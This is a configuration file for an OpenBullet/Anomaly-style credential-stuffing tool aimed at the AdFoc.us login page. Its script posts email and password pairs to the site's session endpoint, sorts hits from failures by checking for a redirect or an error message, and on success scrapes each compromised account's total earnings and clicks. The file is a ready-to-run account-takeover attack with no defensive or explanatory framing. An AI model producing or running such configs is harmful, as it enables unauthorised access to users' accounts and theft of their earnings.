[SETTINGS]
{
  "Name": "AdFoc.us",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-31T20:17:15.5002777+02:00",
  "AdditionalInfo": "",
  "Author": "Patato#0987",
  "Version": "1.3.5 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Transparent": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://adfoc.us/session/create" 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://adfoc.us" 
  HEADER "referer: https://adfoc.us/" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" Contains "https://adfoc.us/user" 
  KEYCHAIN Failure OR 
    KEY "You have entered incorrect login credentials." 

REQUEST POST "https://adfoc.us/user" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "Total Earnings:</strong> " "<br/>" -> CAP "Money" 

PARSE "<SOURCE>" LR ";<strong>Total Clicks:</strong> " "</div>" -> CAP "Total Click " 

